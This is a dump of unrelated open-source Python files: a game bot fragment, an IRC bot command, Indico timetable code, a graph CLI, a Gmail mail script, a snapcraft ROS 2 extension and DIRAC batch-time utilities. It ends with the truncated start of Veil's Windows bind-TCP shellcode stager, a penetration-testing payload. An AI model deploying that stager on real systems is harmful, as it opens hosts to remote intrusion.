war_type = conflict.WarType.capitalize()
score1 = conflict.Faction1.WonDays
score2 = conflict.Faction2.WonDays
                            if war_type == "Civilwar":
war_type = "Civil war"
if data.StarSystem not in self.war_cache or self.war_cache[data.StarSystem] != score1 + score2:
self.war_cache[data.StarSystem] = score1 + score2
if faction1 in (75253, 23831, 74847):
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score1, score2))
else:
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score2, score1))
except AttributeError as e:
conflict_data = None
else:
skip = True
if not skip:
print(data.StarSystem + " recorded")
influences.sort(reverse=True)
if data.StarSystem in self.updated_systems:
for item in our_faction.expansion_warning:
if data.StarSystem in item:
our_faction.expansion_warning.remove(item)
for item in our_faction.mild_warning:
if data.StarSystem in item:
our_faction.mild_warning.remove(item)
for item in our_faction.not_control:
if data.StarSystem in item:
our_faction.not_control.remove(item)
for item in our_faction.high_warning:
if data.StarSystem in item:
our_faction.high_warning.remove(item)
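                    # thresholds: >65% influence risks expansion; otherwise warn on the lead over the runner-up (<0 = not in control, <=10 = too low, 10-20 = getting low)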
if our_influence > 65.00:
our_faction.expansion_warning.append("{} {}%".format(data.StarSystem, round(our_influence, 2)))
else:
if our_influence == influences[0]:
difference = our_influence - influences[1]
else:
difference = our_influence - influences[0]
if 10.00 < difference <= 20.00:
our_faction.mild_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference < 0.00:
our_faction.not_control.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference <= 10.00:
our_faction.high_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
await self.update_message(our_id, conflict_data)
await database.Database.close_connection(db)
def setup(bot):
bot.add_cog(BGS(bot))
| mit | -6,322,656,993,902,909,000 | 51.201049 | 237 | 0.510901 | false | 4.355163 | false | false | false |
munin/munin | munin/mod/xp.py | 1 | 4204 | """
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# Nothing hardcoded found here.
# qebab, 24/6/08.
import re
from munin import loadable
class xp(loadable.loadable):
def __init__(self, cursor):
super().__init__(cursor, 1)
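        # coords are x:y:z (also x.y.z / x-y-z); optional attacker coords and an MC count may follow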
self.paramre = re.compile(
r"^\s*(\d+)[.-:\s](\d+)[.-:\s](\d+)(?:\s+(\d+)[.-:\s](\d+)[.-:\s](\d+))?(?:\s+(\d+))?"
)
self.usage = (
self.__class__.__name__ + " <defender coords> [attacker coords] [MCs]"
)
def execute(self, user, access, irc_msg):
m = self.paramre.search(irc_msg.command_parameters)
if not m:
irc_msg.reply("Usage: %s" % (self.usage,))
return 0
if access < self.level:
irc_msg.reply("You do not have enough access to use this command")
return 0
victim = None
attacker = None
mcs = 0
victim = loadable.planet(x=m.group(1), y=m.group(2), z=m.group(3))
if not victim.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet" % (victim.x, victim.y, victim.z)
)
return 1
if not victim:
irc_msg.reply("Usage: %s" % (self.usage,))
return 1
if m.lastindex >= 6 and m.group(4) and m.group(5) and m.group(6):
attacker = loadable.planet(x=m.group(4), y=m.group(5), z=m.group(6))
if not attacker.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet"
% (attacker.x, attacker.y, attacker.z)
)
return 1
if not attacker:
u = loadable.user(pnick=irc_msg.user)
u.load_from_db(self.cursor, irc_msg.round)
if not u.planet:
irc_msg.reply(
"You must be registered to use the automatic %s command (log in with P and "
"set mode +x, then make sure your planet is set with the pref command (!pref planet=x:y:z))"
% (self.__class__.__name__)
)
return 1
attacker = u.planet
if m.lastindex == 7:
mcs = int(m.group(7))
reply = "Target %s:%s:%s (%s|%s) " % (
victim.x,
victim.y,
victim.z,
self.format_real_value(victim.value),
self.format_real_value(victim.score),
)
reply += "| Attacker %s:%s:%s (%s|%s) " % (
attacker.x,
attacker.y,
attacker.z,
self.format_real_value(attacker.value),
self.format_real_value(attacker.score),
)
bravery = attacker.bravery(victim)
cap = int(attacker.cap_rate(victim) * victim.size)
min_xp, max_xp = attacker.calc_xp(victim, mcs)
min_score = self.format_real_value(60 * min_xp)
max_score = self.format_real_value(60 * max_xp)
reply += "| Bravery: %.2f | Cap: %d | MCs: %d | XP: %d-%d | Score: %s-%s" % (
bravery,
cap,
mcs,
min_xp,
max_xp,
min_score,
max_score
)
irc_msg.reply(reply)
return 1
| gpl-2.0 | 178,729,172,943,288,640 | 33.178862 | 112 | 0.545671 | false | 3.454396 | false | false | false |
eliasdesousa/indico | indico/modules/events/timetable/legacy.py | 2 | 16500 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from collections import defaultdict
from hashlib import md5
from itertools import chain
from flask import has_request_context, session
from sqlalchemy.orm import defaultload
from indico.modules.events.contributions.models.persons import AuthorType
from indico.modules.events.models.events import EventType
from indico.modules.events.timetable.models.entries import TimetableEntry, TimetableEntryType
from indico.util.date_time import iterdays
from indico.web.flask.util import url_for
class TimetableSerializer(object):
def __init__(self, event, management=False, user=None):
self.management = management
self.user = user if user is not None or not has_request_context() else session.user
self.event = event
self.can_manage_event = self.event.can_manage(self.user)
def serialize_timetable(self, days=None, hide_weekends=False, strip_empty_days=False):
tzinfo = self.event.tzinfo if self.management else self.event.display_tzinfo
self.event.preload_all_acl_entries()
timetable = {}
for day in iterdays(self.event.start_dt.astimezone(tzinfo), self.event.end_dt.astimezone(tzinfo),
skip_weekends=hide_weekends, day_whitelist=days):
date_str = day.strftime('%Y%m%d')
timetable[date_str] = {}
contributions_strategy = defaultload('contribution')
contributions_strategy.subqueryload('person_links')
contributions_strategy.subqueryload('references')
query_options = (contributions_strategy,
defaultload('session_block').subqueryload('person_links'))
query = (TimetableEntry.query.with_parent(self.event)
.options(*query_options)
.order_by(TimetableEntry.type != TimetableEntryType.SESSION_BLOCK))
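        # session blocks sort first so their 'entries' dicts exist before child entries are attached below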
for entry in query:
day = entry.start_dt.astimezone(tzinfo).date()
date_str = day.strftime('%Y%m%d')
if date_str not in timetable:
continue
if not entry.can_view(self.user):
continue
data = self.serialize_timetable_entry(entry, load_children=False)
key = self._get_entry_key(entry)
if entry.parent:
parent_code = 's{}'.format(entry.parent_id)
timetable[date_str][parent_code]['entries'][key] = data
else:
if (entry.type == TimetableEntryType.SESSION_BLOCK and
entry.start_dt.astimezone(tzinfo).date() != entry.end_dt.astimezone(tzinfo).date()):
# If a session block lasts into another day we need to add it to that day, too
timetable[entry.end_dt.astimezone(tzinfo).date().strftime('%Y%m%d')][key] = data
timetable[date_str][key] = data
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
def serialize_session_timetable(self, session_, without_blocks=False, strip_empty_days=False):
event_tz = self.event.tzinfo
timetable = {}
if session_.blocks:
start_dt = min(chain((b.start_dt for b in session_.blocks), (self.event.start_dt,))).astimezone(event_tz)
end_dt = max(chain((b.end_dt for b in session_.blocks), (self.event.end_dt,))).astimezone(event_tz)
else:
start_dt = self.event.start_dt_local
end_dt = self.event.end_dt_local
for day in iterdays(start_dt, end_dt):
timetable[day.strftime('%Y%m%d')] = {}
for block in session_.blocks:
block_entry = block.timetable_entry
if not block_entry:
continue
date_key = block_entry.start_dt.astimezone(event_tz).strftime('%Y%m%d')
entries = block_entry.children if without_blocks else [block_entry]
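            # without_blocks flattens the result to the blocks' child entries instead of the blocks themselves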
for entry in entries:
if not entry.can_view(self.user):
continue
entry_key = self._get_entry_key(entry)
timetable[date_key][entry_key] = self.serialize_timetable_entry(entry, load_children=True)
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
@staticmethod
def _strip_empty_days(timetable):
"""Return the timetable without the leading and trailing empty days."""
days = sorted(timetable)
first_non_empty = next((day for day in days if timetable[day]), None)
if first_non_empty is None:
return {}
last_non_empty = next((day for day in reversed(days) if timetable[day]), first_non_empty)
return {day: timetable[day] for day in days if first_non_empty <= day <= last_non_empty}
def serialize_timetable_entry(self, entry, **kwargs):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return self.serialize_session_block_entry(entry, kwargs.pop('load_children', True))
elif entry.type == TimetableEntryType.CONTRIBUTION:
return self.serialize_contribution_entry(entry)
elif entry.type == TimetableEntryType.BREAK:
return self.serialize_break_entry(entry)
else:
raise TypeError("Unknown timetable entry type.")
def serialize_session_block_entry(self, entry, load_children=True):
block = entry.session_block
data = {}
if not load_children:
entries = defaultdict(dict)
else:
entries = {self._get_entry_key(x): self.serialize_timetable_entry(x) for x in entry.children}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(block.session))
data.update(self._get_location_data(block))
data.update({'entryType': 'Session',
'sessionSlotId': block.id,
'sessionId': block.session_id,
'sessionCode': block.session.code,
'title': block.session.title,
'slotTitle': block.title,
'attachments': self._get_attachment_data(block.session),
'code': block.session.code,
'contribDuration': block.session.default_contribution_duration.seconds / 60,
'conveners': [self._get_person_data(x) for x in block.person_links],
'description': block.session.description,
'duration': block.duration.seconds / 60,
'isPoster': block.session.is_poster,
'entries': entries,
'pdf': url_for('sessions.export_session_timetable', block.session),
'url': url_for('sessions.display_session', block.session),
'friendlyId': block.session.friendly_id})
return data
def serialize_contribution_entry(self, entry):
from indico.modules.events.api import SerializerBase
block = entry.parent.session_block if entry.parent else None
contribution = entry.contribution
data = {}
data.update(self._get_entry_data(entry))
if contribution.session:
data.update(self._get_color_data(contribution.session))
data.update(self._get_location_data(contribution))
data.update({'entryType': 'Contribution',
'_type': 'ContribSchEntry',
'_fossil': 'contribSchEntryDisplay',
'contributionId': contribution.id,
'attachments': self._get_attachment_data(contribution),
'description': contribution.description,
'duration': contribution.duration.seconds / 60,
'pdf': url_for('contributions.export_pdf', entry.contribution),
'presenters': map(self._get_person_data,
sorted([p for p in contribution.person_links if p.is_speaker],
key=lambda x: (x.author_type != AuthorType.primary,
x.author_type != AuthorType.secondary,
x.display_order_key))),
'sessionCode': block.session.code if block else None,
'sessionId': block.session_id if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': contribution.title,
'url': url_for('contributions.display_contribution', contribution),
'friendlyId': contribution.friendly_id,
'references': map(SerializerBase.serialize_reference, contribution.references),
'board_number': contribution.board_number})
return data
def serialize_break_entry(self, entry, management=False):
block = entry.parent.session_block if entry.parent else None
break_ = entry.break_
data = {}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(break_))
data.update(self._get_location_data(break_))
data.update({'entryType': 'Break',
'_type': 'BreakTimeSchEntry',
'_fossil': 'breakTimeSchEntry',
'description': break_.description,
'duration': break_.duration.seconds / 60,
'sessionId': block.session_id if block else None,
'sessionCode': block.session.code if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': break_.title})
return data
def _get_attachment_data(self, obj):
def serialize_attachment(attachment):
return {'id': attachment.id,
'_type': 'Attachment',
'_fossil': 'attachment',
'title': attachment.title,
'download_url': attachment.download_url}
def serialize_folder(folder):
return {'id': folder.id,
'_type': 'AttachmentFolder',
'_fossil': 'folder',
'title': folder.title,
'attachments': map(serialize_attachment, folder.attachments)}
data = {'files': [], 'folders': []}
items = obj.attached_items
data['files'] = map(serialize_attachment, items.get('files', []))
data['folders'] = map(serialize_folder, items.get('folders', []))
if not data['files'] and not data['folders']:
data['files'] = None
return data
def _get_color_data(self, obj):
return {'color': '#' + obj.background_color,
'textColor': '#' + obj.text_color}
def _get_date_data(self, entry):
if self.management:
tzinfo = entry.event.tzinfo
else:
tzinfo = entry.event.display_tzinfo
return {'startDate': self._get_entry_date_dt(entry.start_dt, tzinfo),
'endDate': self._get_entry_date_dt(entry.end_dt, tzinfo)}
def _get_entry_data(self, entry):
from indico.modules.events.timetable.operations import can_swap_entry
data = {}
data.update(self._get_date_data(entry))
data['id'] = self._get_entry_key(entry)
data['uniqueId'] = data['id']
data['conferenceId'] = entry.event_id
if self.management:
data['isParallel'] = entry.is_parallel()
data['isParallelInSession'] = entry.is_parallel(in_session=True)
data['scheduleEntryId'] = entry.id
data['canSwapUp'] = can_swap_entry(entry, direction='up')
data['canSwapDown'] = can_swap_entry(entry, direction='down')
return data
def _get_entry_key(self, entry):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return 's{}'.format(entry.id)
elif entry.type == TimetableEntryType.CONTRIBUTION:
return 'c{}'.format(entry.id)
elif entry.type == TimetableEntryType.BREAK:
return 'b{}'.format(entry.id)
else:
raise ValueError()
def _get_entry_date_dt(self, dt, tzinfo):
return {'date': dt.astimezone(tzinfo).strftime('%Y-%m-%d'),
'time': dt.astimezone(tzinfo).strftime('%H:%M:%S'),
'tz': str(tzinfo)}
def _get_location_data(self, obj):
data = {}
data['location'] = obj.venue_name
data['room'] = obj.room_name
data['inheritLoc'] = obj.inherit_location
data['inheritRoom'] = obj.inherit_location
if self.management:
data['address'] = obj.address
return data
def _get_person_data(self, person_link):
person = person_link.person
data = {'firstName': person_link.first_name,
'familyName': person_link.last_name,
'affiliation': person_link.affiliation,
'emailHash': md5(person.email.encode('utf-8')).hexdigest() if person.email else None,
'name': person_link.get_full_name(last_name_first=False, last_name_upper=False,
abbrev_first_name=False, show_title=True),
'displayOrderKey': person_link.display_order_key}
if self.can_manage_event:
data['email'] = person.email
return data
def serialize_contribution(contribution):
return {'id': contribution.id,
'friendly_id': contribution.friendly_id,
'title': contribution.title}
def serialize_day_update(event, day, block=None, session_=None):
serializer = TimetableSerializer(event, management=True)
timetable = serializer.serialize_session_timetable(session_) if session_ else serializer.serialize_timetable()
block_id = serializer._get_entry_key(block) if block else None
day = day.strftime('%Y%m%d')
return {'day': day,
'entries': timetable[day] if not block else timetable[day][block_id]['entries'],
'slotEntry': serializer.serialize_session_block_entry(block) if block else None}
def serialize_entry_update(entry, session_=None):
serializer = TimetableSerializer(entry.event, management=True)
day = entry.start_dt.astimezone(entry.event.tzinfo)
day_update = serialize_day_update(entry.event, day, block=entry.parent, session_=session_)
return dict({'id': serializer._get_entry_key(entry),
'entry': serializer.serialize_timetable_entry(entry),
'autoOps': None},
**day_update)
def serialize_event_info(event):
return {'_type': 'Conference',
'id': unicode(event.id),
'title': event.title,
'startDate': event.start_dt_local,
'endDate': event.end_dt_local,
'isConference': event.type_ == EventType.conference,
'sessions': {sess.id: serialize_session(sess) for sess in event.sessions}}
def serialize_session(sess):
"""Return data for a single session"""
data = {
'_type': 'Session',
'address': sess.address,
'color': '#' + sess.colors.background,
'description': sess.description,
'id': sess.id,
'isPoster': sess.is_poster,
'location': sess.venue_name,
'room': sess.room_name,
'roomFullname': sess.room_name,
'textColor': '#' + sess.colors.text,
'title': sess.title,
'url': url_for('sessions.display_session', sess)
}
return data
| gpl-3.0 | 9,132,719,580,124,701,000 | 46.413793 | 117 | 0.593636 | false | 4.128096 | false | false | false |
adason/graph_algo | graph_algo/graph_algo.py | 1 | 1876 | # -*- coding: utf-8 -*-
"""Main program for Command Line interface
Usage:
graph_algo -h
graph_algo --version
graph_algo p1hw4 [-v] -i <file>
  graph_algo p2hw4 [--argo <algo>] [-v] -i <file>...
graph_algo p2hw6 [-v] -i <file>...
Options:
-h --help show this help message and exit
--version show version and exit
-v --verbose print status messages
-i, --input <file>... input file(s)
--argo <algo> choose one algorithm
"""
from __future__ import unicode_literals, print_function
from docopt import docopt
from .graph import Graph
__version__ = "0.1.0"
__author__ = "Adason"
__license__ = "MIT"
def main():
"""Main entry point for the graph_algo CLI.
"""
args = docopt(__doc__, version=__version__)
# print(args)
if args["p1hw4"]:
g = Graph.read_input_part1_hw4(args["--input"][0])
sizes = []
for scc in g.kosaraju_sccs():
sizes.append(len(scc))
print(sorted(sizes, reverse=True))
elif args["p2hw4"]:
min_dists = []
for fn in args["--input"]:
g = Graph.read_input_part2_hw4(fn)
dist_pairs = g.floyd_warshall_apsp()
if dist_pairs:
min_dists.extend(dist_pairs.values())
if len(min_dists) > 0:
print(min(min_dists))
else:
print("NULL")
elif args["p2hw6"]:
for fn in args["--input"]:
g = Graph.read_input_part2_hw6(fn)
sol_status = 1
for scc in g.kosaraju_sccs():
scc_vids = set(scc)
for vid in scc:
if str(-int(vid)) in scc_vids:
sol_status = 0
break
if sol_status == 0:
break
print(sol_status, end="")
| mit | -7,334,569,178,823,456,000 | 26.588235 | 60 | 0.498934 | false | 3.474074 | false | false | false |
thecount12/madblog | pvgmail.py | 1 | 1101 | #!/usr/bin/python
# mail form program using gmail
import base64
import smtplib
from email.mime.text import MIMEText
# change smtpuser, zap
# recipients I use similar to carbon copy
# REPLY_TO_ADDRESS is the user filling out the form
def gmail(REPLY_TO_ADDRESS,data,subject):
smtpserver = 'smtp.gmail.com' # gmail smtp
smtpuser = 'user@gmail.com' # gmail user account
zap='' # enter encoded password
    smtppass=base64.b64decode(zap)  # decode the base64-encoded password
RECIPIENTS = ["'blah' <user@yahoo.com>"]
msg = MIMEText(data)
msg['Subject'] = subject
msg.add_header('reply-to', REPLY_TO_ADDRESS)
    mailServer = smtplib.SMTP(smtpserver, 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(smtpuser, smtppass)
mailServer.sendmail(smtpuser,RECIPIENTS,msg.as_string())
mailServer.close()
if __name__=="__main__":
REPLY_TO_ADDRESS='user@linuxmail.org'
data="any message"
subject="whatever"
gmail(REPLY_TO_ADDRESS,data,subject)
| gpl-2.0 | 7,159,319,071,805,507,000 | 27.230769 | 64 | 0.641235 | false | 3.484177 | false | false | false |
snapcore/snapcraft | snapcraft/internal/project_loader/_extensions/ros2_foxy.py | 2 | 2886 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import types and tell flake8 to ignore the "unused" List.
from typing import Any, Dict, Optional, Tuple
from typing_extensions import Final
from ._extension import Extension
_PLATFORM_SNAP = dict(core18="gnome-3-34-1804")
class ExtensionImpl(Extension):
"""Drives ROS 2 build and runtime environment for snap."""
ROS_DISTRO: Final[str] = "foxy"
@staticmethod
def get_supported_bases() -> Tuple[str, ...]:
return ("core20",)
@staticmethod
def get_supported_confinement() -> Tuple[str, ...]:
return ("strict", "devmode")
@staticmethod
def is_experimental(base: Optional[str]) -> bool:
return True
def __init__(self, *, extension_name: str, yaml_data: Dict[str, Any]) -> None:
super().__init__(extension_name=extension_name, yaml_data=yaml_data)
python_paths = [
f"$SNAP/opt/ros/{self.ROS_DISTRO}/lib/python3.8/site-packages",
"$SNAP/usr/lib/python3/dist-packages",
"${PYTHONPATH}",
]
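        # these paths are expanded at snap runtime; they expose the ROS python packages to apps via PYTHONPATH below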
self.root_snippet = {
"package-repositories": [
{
"type": "apt",
"url": "http://repo.ros2.org/ubuntu/main",
"components": ["main"],
"formats": ["deb"],
"key-id": "C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654",
"key-server": "keyserver.ubuntu.com",
"suites": ["focal"],
}
]
}
self.app_snippet = {
"command-chain": ["snap/command-chain/ros2-launch"],
"environment": {
"ROS_DISTRO": self.ROS_DISTRO,
"PYTHONPATH": ":".join(python_paths),
},
}
self.part_snippet = {"build-environment": [{"ROS_DISTRO": self.ROS_DISTRO}]}
self.parts = {
f"ros2-{self.ROS_DISTRO}-extension": {
"source": "$SNAPCRAFT_EXTENSIONS_DIR/ros2",
"plugin": "nil",
"override-build": "install -D -m 0755 launch ${SNAPCRAFT_PART_INSTALL}/snap/command-chain/ros2-launch",
"build-packages": [f"ros-{self.ROS_DISTRO}-ros-core"],
}
}
| gpl-3.0 | -9,029,293,964,805,424,000 | 32.952941 | 119 | 0.578309 | false | 3.767624 | false | false | false |
Andrew-McNab-UK/DIRAC | Core/Utilities/TimeLeft/TimeLeft.py | 2 | 9585 | """ The TimeLeft utility allows to calculate the amount of CPU time
left for a given batch system slot. This is essential for the 'Filling
Mode' where several VO jobs may be executed in the same allocated slot.
The prerequisites for the utility to run are:
- Plugin for extracting information from local batch system
- Scale factor for the local site.
With this information the utility can calculate in normalized units the
CPU time remaining for a given slot.
"""
import os
import DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import shellCall
__RCSID__ = "$Id$"
class TimeLeft( object ):
""" This generally does not run alone
"""
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'TimeLeft' )
# This is the ratio SpecInt published by the site over 250 (the reference used for Matching)
self.scaleFactor = gConfig.getValue( '/LocalSite/CPUScalingFactor', 0.0 )
if not self.scaleFactor:
self.log.warn( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
self.normFactor = gConfig.getValue( '/LocalSite/CPUNormalizationFactor', 0.0 )
if not self.normFactor:
self.log.warn( '/LocalSite/CPUNormalizationFactor not defined for site %s' % DIRAC.siteName() )
# CPU and wall clock margins, which don't seem to be set anywhere
self.cpuMargin = gConfig.getValue('/LocalSite/CPUMargin', 2) # percent
self.wallClockMargin = gConfig.getValue('/LocalSite/wallClockMargin', 8) # percent
result = self.__getBatchSystemPlugin()
if result['OK']:
self.batchPlugin = result['Value']
else:
self.batchPlugin = None
self.batchError = result['Message']
def getScaledCPU( self, processors = 1 ):
"""Returns the current CPU Time spend (according to batch system) scaled according
to /LocalSite/CPUScalingFactor
"""
# Quit if no scale factor available
if not self.scaleFactor:
return 0
# Quit if Plugin is not available
if not self.batchPlugin:
return 0
resourceDict = self.batchPlugin.getResourceUsage()
if 'Value' in resourceDict:
if resourceDict['Value']['CPU']:
return resourceDict['Value']['CPU'] * self.scaleFactor
elif resourceDict['Value']['WallClock']:
# When CPU value missing, guess from WallClock and number of processors
return resourceDict['Value']['WallClock'] * self.scaleFactor * processors
return 0
#############################################################################
def getTimeLeft( self, cpuConsumed = 0.0, processors = 1 ):
"""Returns the CPU Time Left for supported batch systems. The CPUConsumed
is the current raw total CPU.
"""
# Quit if no scale factor available
if not self.scaleFactor:
return S_ERROR( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
if not self.batchPlugin:
return S_ERROR( self.batchError )
resourceDict = self.batchPlugin.getResourceUsage()
if not resourceDict['OK']:
self.log.warn( 'Could not determine timeleft for batch system at site %s' % DIRAC.siteName() )
return resourceDict
resources = resourceDict['Value']
self.log.debug( "self.batchPlugin.getResourceUsage(): %s" % str( resources ) )
if not resources['CPULimit'] and not resources['WallClockLimit']:
# This should never happen
return S_ERROR( 'No CPU or WallClock limit obtained' )
# if one of CPULimit or WallClockLimit is missing, compute a reasonable value
if not resources['CPULimit']:
resources['CPULimit'] = resources['WallClockLimit'] * processors
elif not resources['WallClockLimit']:
resources['WallClockLimit'] = resources['CPULimit']
# if one of CPU or WallClock is missing, compute a reasonable value
if not resources['CPU']:
resources['CPU'] = resources['WallClock'] * processors
elif not resources['WallClock']:
resources['WallClock'] = resources['CPU']
timeLeft = 0.
cpu = float( resources['CPU'] )
cpuLimit = float( resources['CPULimit'] )
wallClock = float( resources['WallClock'] )
wallClockLimit = float( resources['WallClockLimit'] )
validTimeLeft = enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, self.cpuMargin, self.wallClockMargin)
if validTimeLeft:
if cpu and cpuConsumed > 3600. and self.normFactor:
# If there has been more than 1 hour of consumed CPU and
# there is a Normalization set for the current CPU
# use that value to renormalize the values returned by the batch system
# NOTE: cpuConsumed is non-zero for call by the JobAgent and 0 for call by the watchdog
# cpuLimit and cpu may be in the units of the batch system, not real seconds... (in this case the other case won't work)
# therefore renormalise it using cpuConsumed (which is in real seconds)
timeLeft = ( cpuLimit - cpu ) * self.normFactor * cpuConsumed / cpu
elif self.normFactor:
# FIXME: this is always used by the watchdog... Also used by the JobAgent
# if consumed less than 1 hour of CPU
# It was using self.scaleFactor but this is inconsistent: use the same as above
# In case the returned cpu and cpuLimit are not in real seconds, this is however rubbish
timeLeft = ( cpuLimit - cpu ) * self.normFactor
else:
# Last resort recovery...
timeLeft = ( cpuLimit - cpu ) * self.scaleFactor
self.log.verbose( 'Remaining CPU in normalized units is: %.02f' % timeLeft )
return S_OK( timeLeft )
else:
return S_ERROR( 'No time left for slot' )
#############################################################################
def __getBatchSystemPlugin( self ):
""" Using the name of the batch system plugin, will return an instance of the plugin class.
"""
batchSystems = {'LSF':'LSB_JOBID', 'PBS':'PBS_JOBID', 'BQS':'QSUB_REQNAME', 'SGE':'SGE_TASK_ID'} # more to be added later
name = None
for batchSystem, envVar in batchSystems.items():
if envVar in os.environ:
name = batchSystem
break
if name is None and 'MACHINEFEATURES' in os.environ and 'JOBFEATURES' in os.environ:
# Only use MJF if legacy batch system information not available for now
name = 'MJF'
if name is None:
self.log.warn( 'Batch system type for site %s is not currently supported' % DIRAC.siteName() )
return S_ERROR( 'Current batch system is not supported' )
self.log.debug( 'Creating plugin for %s batch system' % ( name ) )
try:
batchSystemName = "%sTimeLeft" % ( name )
batchPlugin = __import__( 'DIRAC.Core.Utilities.TimeLeft.%s' % #pylint: disable=unused-variable
batchSystemName, globals(), locals(), [batchSystemName] )
except ImportError as x:
msg = 'Could not import DIRAC.Core.Utilities.TimeLeft.%s' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
try:
batchStr = 'batchPlugin.%s()' % ( batchSystemName )
batchInstance = eval( batchStr )
except Exception as x: #pylint: disable=broad-except
msg = 'Could not instantiate %s()' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
return S_OK( batchInstance )
#############################################################################
def runCommand( cmd, timeout = 120 ):
"""Wrapper around shellCall to return S_OK(stdout) or S_ERROR(message)
"""
result = shellCall( timeout, cmd )
if not result['OK']:
return result
status, stdout, stderr = result['Value'][0:3]
if status:
gLogger.warn( 'Status %s while executing %s' % ( status, cmd ) )
gLogger.warn( stderr )
if stdout:
return S_ERROR( stdout )
if stderr:
return S_ERROR( stderr )
return S_ERROR( 'Status %s while executing %s' % ( status, cmd ) )
else:
return S_OK( str( stdout ) )
def enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, cpuMargin, wallClockMargin):
""" Is there enough time?
:returns: True/False
"""
cpuRemainingFraction = 100 * (1. - cpu / cpuLimit)
wallClockRemainingFraction = 100 * (1. - wallClock / wallClockLimit)
fractionTuple = ( cpuRemainingFraction, wallClockRemainingFraction, cpuMargin, wallClockMargin )
gLogger.verbose( 'Used CPU is %.1f s out of %.1f, Used WallClock is %.1f s out of %.1f.' % ( cpu,
cpuLimit,
wallClock,
wallClockLimit ) )
gLogger.verbose( 'Remaining CPU %.02f%%, Remaining WallClock %.02f%%, margin CPU %s%%, margin WC %s%%' % fractionTuple )
if cpuRemainingFraction > cpuMargin \
and wallClockRemainingFraction > wallClockMargin:
gLogger.verbose( 'Remaining CPU %.02f%% < Remaining WallClock %.02f%% and margins respected (%s%% and %s%%)' % fractionTuple )
return True
else:
gLogger.verbose( 'Remaining CPU %.02f%% or WallClock %.02f%% fractions < margin (%s%% and %s%%) so no time left' % fractionTuple )
return False
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
| gpl-3.0 | -4,320,293,889,383,008,000 | 40.855895 | 134 | 0.629734 | false | 4.037489 | false | false | false |
Veil-Framework/Veil | tools/ordnance/payloads/x86/bind_tcp.py | 1 | 5084 | """
Bind TCP Payload
Completely ported from Metasploit Framework:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb
"""
import codecs
from lib.common import helpers
class ShellcodeModule:
def __init__(self, cli_arguments):
self.name = "Bind TCP Stager (Stage 1)"
self.description = "Binds to a user provided port and listens for an incoming connection"
self.cli_name = "bind_tcp"
self.platform = "Windows"
self.arch = "x86"
self.port_offset = 197
self.customized_shellcode = ""
self.stager = (
b"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
